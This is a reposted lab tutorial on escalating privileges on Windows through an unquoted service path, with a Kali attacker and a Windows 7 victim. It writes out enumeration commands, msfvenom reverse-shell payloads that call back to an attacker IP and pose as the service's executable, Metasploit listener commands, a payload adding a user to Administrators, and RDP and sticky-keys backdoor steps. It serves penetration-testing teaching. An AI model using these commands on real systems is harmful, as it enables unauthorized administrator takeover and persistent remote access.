未加星标

Windows Privilege Escalation (Unquoted Path Service)

字体大小 | |
[系统(windows) 所属分类 系统(windows) | 发布者 店小二05 | 时间 2018 | 作者 红领巾 ] 0人收藏点击收藏

Hello Friends!! In this article we are demonstrating windows privilege escalation via Unquoted service Path. In penetration testing when we spawn command shell as local user, it is not possible to check restricted file or folder, therefore we need to escalated privileges to get administrators access.

Table of content

Introduction Lab setup Spawn command shell as local user Escalated privilege via Prepend-migrate Escalated privilege via Adding user Administrators Group Escalated privilege via RDP & Sticky_keys

Introduction

Unquoted service Path Vulnerability

The vulnerability is related to the path of the executable that has a space in the filename and the file name is not enclosed in quote tags (“”) . Also, if it has writable permissions, then an attacker can replace executable file with its malicious exe file , so as to escalate admin privileges.

Lab set-up

Victim’s Machine:Windows 7

Attacker’s machine:Kali linux

First we have downloaded and installed a Vulnerable application naming photodex proshow in our windows system, which we found under Exploit DB.


Windows Privilege Escalation (Unquoted Path Service)
Spawning Victim’s Machine

We need to compromise the windows machine at least once to gain meterpreter session. As you can observe we already have victim’s metrepreter session. Now let’s open the command shell from here.

shell
Windows Privilege Escalation (Unquoted Path Service)

As you can observe, we have shell access as local_user and to get cmd as administrator we need to escalate its privileges. Firstly we can enumerate out all the services that are running on the victim’s machine and discover those that are not bounded inside quotes tag with help of following command:

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

So we have enumerated following path: C:\Program Files\Photodex\ProShow Producer\Scsiaccess.exe as you can see there is not quotes tag around the path and also space in filename.


Windows Privilege Escalation (Unquoted Path Service)

Now let’s identify the folder permissions using following command:

icacls Scsiaccess.exe

As you can observe it has writeable permission for everyone which means user raj can overwrite this file.


Windows Privilege Escalation (Unquoted Path Service)
Escalated privilege via Prepend-migrate

Now we can place any malicious exe file in the same folder that will give admin privilege when the service will be restarted, Windows will launch this executable instead of the genuine exe.

Open the terminal in kali Linux and type following command to generate exe payload using msfvenom.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.107 lport=1234 prependmigrate=true prepenmigrateprocess=explorer.exe f exe > /root/Desktop/ Scsiaccess.exe

Above command will create a malicious exe file on the Desktop and now send this file to the victim. The payload migrate its process, if current process gets killed; hence attacker will not lose his session if victim kills the current process ID of the payload from its system.


Windows Privilege Escalation (Unquoted Path Service)

Now replace genuine executable file from the malicious exe, here I have renamed genuine Scsiaccess.exe to Scsiaccess.exe.orginal and uploaded malicious Scsiaccess.exe in same folder and then reboot the victim’s machine.

move scsiaccess.exe scsiaccess.exe.orginal upload /root/Desktop/ scsiaccess.exe reboot
Windows Privilege Escalation (Unquoted Path Service)

Simultaneously we have start multi/handler listener in a new terminal to catch the meterpreter session with admin privilege.

use exploit/multi/handler msf exploit(multi/handler) set payload windows /meterpreter/reverse_tcp msf exploit(multi/handler) set lhost 192.168.1.107 msf exploit(multi/handler) set lport 1234 msf exploit(multi/handler) exploit

Yuppie!! And after sometime we got shell with admin privileges.


Windows Privilege Escalation (Unquoted Path Service)
Escalated privilege via Adding user Administrators Group

After spawning shell as local_user, we enumerated all username list with or without admin privileges. So we found user:raaz is not the member of the admin group.

net user net user raaz
Windows Privilege Escalation (Unquoted Path Service)

So again we generated an exe file which will add user:raaz into administrators group. The name of our exe file will be same i.e. Scsiaccess.exe

msfvenom -p windows/exec CMD='net localgroup administrators raaz /add' -f exe > /root/Desktop/ scsiaccess.exe
Windows Privilege Escalation (Unquoted Path Service)

Now repeat the above steps, replace genuine executable file from the malicious exe file and reboot the host machine.


Windows Privilege Escalation (Unquoted Path Service)

If you will notice the following image, you can observe that the user raaz has become the member of Administrators group.


Windows Privilege Escalation (Unquoted Path Service)
Escalated privilege via RDP & Sticky_keys

Generate an exe using msfvenom with similar name Scsiaccess.exe and then transfer into victim’s machine, meanwhile run multi handler with auto run script which will enable RDP service once the service gets restarted.

use exploit/multi/handler msf exploit(multi/handler) set payload windows /meterpreter/reverse_tcp msf exploit(multi/handler) set lhost 192.168.1.107 msf exploit(multi/handler) set lport 1234 msf exploit(multi/handler) set AutoRunScript post/windows/manage/enable_rdp msf exploit(multi/handler) exploit
Windows Privilege Escalation (Unquoted Path Service)

Similarly, we will set the auto run script to enable sticky_keys once the service restarts.

msf exploit(multi/handler) set AutoRunScript post/windows/manage/sticky_keys msf exploit(multi/handler) run

As you can observe from below screenshot , another meterpreter session (session 3) got opened which has administrative rights. Now let’s connect to victim’s host via RDP.

rdp 192.168.1.101
Windows Privilege Escalation (Unquoted Path Service)

Now press shift_key 5 times continuously and you will get command prompt as administrator.


Windows Privilege Escalation (Unquoted Path Service)

Source:https://www.exploit-db.com/exploits/24872/

Author:AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact

本文系统(windows)相关术语:三级网络技术 计算机三级网络技术 网络技术基础 计算机网络技术

tags: exe,exploit,multi,handler,file,user,will,set,privilege,windows
分页:12
转载请注明
本文标题:Windows Privilege Escalation (Unquoted Path Service)
本站链接:https://www.codesec.net/view/589086.html


1.凡CodeSecTeam转载的文章,均出自其它媒体或其他官网介绍,目的在于传递更多的信息,并不代表本站赞同其观点和其真实性负责;
2.转载的文章仅代表原创作者观点,与本站无关。其原创性以及文中陈述文字和内容未经本站证实,本站对该文以及其中全部或者部分内容、文字的真实性、完整性、及时性,不作出任何保证或承若;
3.如本站转载稿涉及版权等问题,请作者及时联系本站,我们会及时处理。
登录后可拥有收藏文章、关注作者等权限...
技术大类 技术大类 | 系统(windows) | 评论(0) | 阅读(101)